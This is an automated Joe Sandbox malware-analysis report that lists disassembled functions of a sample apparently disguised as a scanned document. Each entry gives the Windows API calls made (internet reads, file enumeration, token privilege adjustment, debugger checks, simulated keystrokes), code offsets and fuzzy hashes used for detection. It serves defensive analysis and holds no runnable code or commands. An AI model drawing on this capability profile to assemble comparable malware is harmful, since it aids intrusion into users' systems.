Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 280e5ea90575dffde57b4b8e4e6c4a69fe3620f89f59212378426c982db2c3b6
Instruction ID: e4d89d304964572152231b3674b480ef13043c721d7f85924c2283f983d4e755
Opcode Fuzzy Hash: 280e5ea90575dffde57b4b8e4e6c4a69fe3620f89f59212378426c982db2c3b6
Instruction Fuzzy Hash: FD31F730A40208AEFB29CA64C845BFE77A6FBC5320F04C21AF199D61D9D375D985C752

Function 0088CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0088CE89
GetLastError.KERNEL32(?,00000000), ref: 0088CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0088CEFE

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 9ee61256e5bb22776ca1e2de2015163071ed9fff0ac9b8165960ae61222676c7
Instruction ID: b422cac32ce97d7bfca0a75494c64fafe71adddba90f3cd6573f66735f01e109
Opcode Fuzzy Hash: 9ee61256e5bb22776ca1e2de2015163071ed9fff0ac9b8165960ae61222676c7
Instruction Fuzzy Hash: 2B219DB1500305ABEB30EF65D949BA6B7F8FB50358F10441EE646D2151EBB4EE048BA0

Function 0087DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00855222), ref: 0087DBCE
GetFileAttributesW.KERNEL32(?), ref: 0087DBDD
FindFirstFileW.KERNEL32(?,?), ref: 0087DBEE
FindClose.KERNEL32(00000000), ref: 0087DBFA

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 79a831e996f4b30caced9c8f08668536dbe092cf4ce4f53e7358f5e694f794f9
Instruction ID: a5513b44b347b5da32322c2e019c3d4919a364a96d2411595eb2213206444bc7
Opcode Fuzzy Hash: 79a831e996f4b30caced9c8f08668536dbe092cf4ce4f53e7358f5e694f794f9
Instruction Fuzzy Hash: 7BF0E530810A145792216B7CAC0D8AA37BCFF82334B108702F83AC26F0EBB49D54C6D5

Function 00878298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 008782AA

Strings

(, xrefs: 008782F0
|, xrefs: 008782DA

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: e8948567dee88fe19c3179195aed61885584201dafe19d0888e6a9b8e9810fd9
Instruction ID: 3e4315dace8ae9acd4099724091ef9217bdbc8a5c60c4521efc749b1b1417eac
Opcode Fuzzy Hash: e8948567dee88fe19c3179195aed61885584201dafe19d0888e6a9b8e9810fd9
Instruction Fuzzy Hash: C3324474A00605DFCB28CF69C084A6AB7F0FF48710B15C56EE59ADB7A5EB70E981CB40

Function 00885C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00885CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00885D17
FindClose.KERNEL32(?), ref: 00885D5F

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 069d966acf489c9466264e4593c8c5a18d9a5fd3cc49b8216fa21329287ed0a6
Instruction ID: bfa16de0fd5c0a47a935b305604b2fef47f2168c5a6dc33c218eb7ab6be4f3b9
Opcode Fuzzy Hash: 069d966acf489c9466264e4593c8c5a18d9a5fd3cc49b8216fa21329287ed0a6
Instruction Fuzzy Hash: 0C519A346046019FC714DF28C494A96B7E4FF49324F14856EE96ACB3A2DB30ED45CF91

Function 00842622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0084271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00842724
UnhandledExceptionFilter.KERNEL32(?), ref: 00842731

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 103fa85694bd72516340e633bdd5b210db18f47ea86ac3f5f0dc8958976afcae
Instruction ID: a0ae00a625feae205408cdc14a079cac187cab6c32ae06a0e1ce871dd22fdaa0
Opcode Fuzzy Hash: 103fa85694bd72516340e633bdd5b210db18f47ea86ac3f5f0dc8958976afcae
Instruction Fuzzy Hash: 0E31B47491122C9BCB21DF68DD897D9BBB8FF48310F5041EAE41CA6261E7709F818F85

Function 008851CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 008851DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00885238
SetErrorMode.KERNEL32(00000000), ref: 008852A1

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 2fe51de855f3dbccc717290ded37f22176f4346a376850aa26a566f18cf970d8
Instruction ID: 7585707be00c5a8b2584deec7bc277720e4d3f5f659d68fb85b20328f20c49a1
Opcode Fuzzy Hash: 2fe51de855f3dbccc717290ded37f22176f4346a376850aa26a566f18cf970d8
Instruction Fuzzy Hash: 02312C75A00518DFDB00EF54D884EADBBB5FF49314F048099E805EB362DB31E856CB91

Function 008716C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0082FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00830668
Part of subcall function 0082FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00830685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0087170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0087173A
GetLastError.KERNEL32 ref: 0087174A

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 571c02eff0b4ee3319e88fa2bb56aca4bf823a323f8f7b7bb4b3c1799c59ea2a
Instruction ID: e4078a1d435ab052e038c9126f45bf5b16a499d4bed637ab125a941e1186aa11
Opcode Fuzzy Hash: 571c02eff0b4ee3319e88fa2bb56aca4bf823a323f8f7b7bb4b3c1799c59ea2a
Instruction Fuzzy Hash: E41194B2414304AFE7189F58EC86D6AB7FDFB44754B20C52EE45697645EB70FC81CA20

Function 0087D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0087D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0087D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0087D650

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 9ad26a22901c90ecb58950b11e34daeca8fa1ba67a7f94928a92ab273f135e8d
Instruction ID: a0da2529d917954f9e4f02ee1a0bd0d96d93c8aa645376bdb232864b3f8e7822
Opcode Fuzzy Hash: 9ad26a22901c90ecb58950b11e34daeca8fa1ba67a7f94928a92ab273f135e8d
Instruction Fuzzy Hash: 9A113C75E05228BBEB108F959C45FAFBBBCFB46B50F108115F908E7294D6704A058BA1

Function 00871663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0087168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008716A1
FreeSid.ADVAPI32(?), ref: 008716B1

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: b2854324620d84566f6a67ff1ab0393319830a64b2d3ce7f5be490a297d300a7
Instruction ID: 14f975cc50021222f181a54d3cae474063be1a0995d89ef05a3f1a12e43fa8df
Opcode Fuzzy Hash: b2854324620d84566f6a67ff1ab0393319830a64b2d3ce7f5be490a297d300a7
Instruction Fuzzy Hash: E3F0F47195030DFBEF00DFE49C89AAEBBBCFB08604F508565E501E2181E774AA448A50

Function 00834CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(008428E9,?,00834CBE,008428E9,008D88B8,0000000C,00834E15,008428E9,00000002,00000000,?,008428E9), ref: 00834D09
TerminateProcess.KERNEL32(00000000,?,00834CBE,008428E9,008D88B8,0000000C,00834E15,008428E9,00000002,00000000,?,008428E9), ref: 00834D10
ExitProcess.KERNEL32 ref: 00834D22

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 8ef01821f8f036cae25588a51b705d70280ff6fac22d2747f3c7e099c1b7a0f5
Instruction ID: 7af196af8871434e553504a1213941ad50d3e31595d4d9ee324f94e6eafbbe51
Opcode Fuzzy Hash: 8ef01821f8f036cae25588a51b705d70280ff6fac22d2747f3c7e099c1b7a0f5
Instruction Fuzzy Hash: AEE0B631000548ABDF51AF54DD09A593B69FB82781F104414FC05DA632DB39ED42DA80

Function 0084C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 0084C36C

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 0004a7fd71e7457474b4a656aae6d14e9e391c29b3db51e9e2794112c0923266
Instruction ID: 08cb46e46966d8ae9608b4682f3ff13189d3990d58538a36b181e94c5411aa49
Opcode Fuzzy Hash: 0004a7fd71e7457474b4a656aae6d14e9e391c29b3db51e9e2794112c0923266
Instruction Fuzzy Hash: CD41267690121DABCB209FB9CC89EBB77BCFB84314F504269F905D7280E6709D81CB50

Function 0086D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0086D28C

Strings

X64, xrefs: 0086D2A8

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: e0b270b6208a189c136f63fb34611c9d2dcd6390d35d155ccea51b54b2b2a23b
Instruction ID: 6e2c9c45aca7a1fd45289ba0722db5f21f1a33143aa9525a0e74249bd8353c5d
Opcode Fuzzy Hash: e0b270b6208a189c136f63fb34611c9d2dcd6390d35d155ccea51b54b2b2a23b
Instruction Fuzzy Hash: EBD0C9B580166DEACB90CB90EC88DD9B77CFB14309F100151F106E2100DB3095488F10

Function 0083CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: c7ae74d5d22689fed4a7c95cebbc19c7bd414f0fb8af528d0a07f731c6078236
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 3E020D72E012199BDF14CFA9D8806ADFBF1FF88314F258169E919F7384D731AA418B94

Function 008868EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00886918
FindClose.KERNEL32(00000000), ref: 00886961

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: d367d2b83307971664c84a3a53e29c01c8e3d1d7063b31b51c89d007407b45ca
Instruction ID: fd57118e21a5d73800ea0b5f37bd52bfdaf92c5d90442436a58cd6d74e35f3a2
Opcode Fuzzy Hash: d367d2b83307971664c84a3a53e29c01c8e3d1d7063b31b51c89d007407b45ca
Instruction Fuzzy Hash: E2119D316042009FD710DF29D888A16BBE5FF89328F14C6A9E469CF7A2DB34EC45CB91

Function 008837B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00894891,?,?,00000035,?), ref: 008837E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00894891,?,?,00000035,?), ref: 008837F4

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 87765843a1d4124d5378435e8f4687db31fa9b4a28ef0d21bc4334f4fa797f88
Instruction ID: a66c83bad438ab707e690397428537efb982b10e193aeac3b4626188b74d48df
Opcode Fuzzy Hash: 87765843a1d4124d5378435e8f4687db31fa9b4a28ef0d21bc4334f4fa797f88
Instruction Fuzzy Hash: FDF0E5B06042282AEB20276A8C4DFEB3AAEFFC5B61F000175F509D2281D9609944C7B1

Function 0087B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0087B25D
keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 0087B270

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 524051892c3e4d217c366adbda91792be568011263a177677af199572bb8bb55
Instruction ID: 56517607f4ed18f5ec4bb18be493a894ea84a9584e88959372fc318eca270a43
Opcode Fuzzy Hash: 524051892c3e4d217c366adbda91792be568011263a177677af199572bb8bb55
Instruction Fuzzy Hash: 25F01D7181424DABEB059FA4C805BBE7BB5FF05309F048009F955E6192C379C6119F94

Function 008710BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008711FC), ref: 008710D4
CloseHandle.KERNEL32(?,?,008711FC), ref: 008710E9

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: a1186907b7acfbdce75961f4fb99819c883057901c734522f2a92e211fd9d0d2
Instruction ID: 159ef090f17797ad386ea1fd1ec5875bef9ec8d238261c917be51bd0882b5e4d
Opcode Fuzzy Hash: a1186907b7acfbdce75961f4fb99819c883057901c734522f2a92e211fd9d0d2
Instruction Fuzzy Hash: 9BE04F32004610AEFB252B15FC09E7377A9FF04310B10882DF5A6C08B1DB62ACD0DB10

Function 0081CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 00860C40

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: 07a757807ee55626050e91f8920dd19b3e679b2cab2c43224e3fb6f6adc00964
Instruction ID: b774454dddc28c2762a82b47238c4f3cf5f0ae51ef3b2919cd4d3d47a5c8a9b0
Opcode Fuzzy Hash: 07a757807ee55626050e91f8920dd19b3e679b2cab2c43224e3fb6f6adc00964
Instruction Fuzzy Hash: BC328D70940218DBCF14DF94D881AEEB7B9FF05308F148159E806EB292DB75AE86CF65

Function 0084676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00846766,?,?,00000008,?,?,0084FEFE,00000000), ref: 00846998

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
